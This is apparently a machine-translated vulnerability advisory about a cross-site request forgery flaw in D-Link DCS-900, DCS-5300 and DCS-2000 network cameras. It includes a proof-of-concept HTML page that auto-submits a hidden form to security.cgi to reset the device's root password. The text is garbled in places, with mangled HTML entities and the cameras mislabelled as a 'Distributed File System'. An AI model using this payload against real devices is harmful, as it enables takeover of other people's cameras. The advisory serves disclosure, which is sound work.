Cross-Site Request Forgery Vulnerability of multiple D-Link DCS products "security. cgi"

Release date:
Updated on:

Affected Systems:
D-Link Distributed File System (DCS) 900
D-Link Distributed File System (DCS) 5300
D-Link Distributed File System (DCS) 2000
Description:
--------------------------------------------------------------------------------
Bugtraq id: 52134

D-Link DCS-900, DCS-5300, DCS-2000 is a Network Camera Products.

D-Link DCS-900, DCS-5300, DCS-2000 security vulnerabilities on implementation can be exploited to run privileged commands, change information, cause denial of service or inject arbitrary script code on the affected device.

<* Source: Rigan Iimrigan
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

& Lt; html & gt;
& Lt; body onload = "javascript: document. forms [0]. submit ()" & gt;
& Lt; form method = "POST" name = "form0" action = "http://www.example.com/setup/security.cgi" & gt;
& Lt; input type = "hidden" name = "rootpass" value = "your_pass"/& gt;
& Lt; input type = "hidden" name = "confirm" value = "your_pass"/& gt;
& Lt;/form & gt;
& Lt;/body & gt;
& Lt;/html & gt;

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

D-Link
------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://www.dlink.com/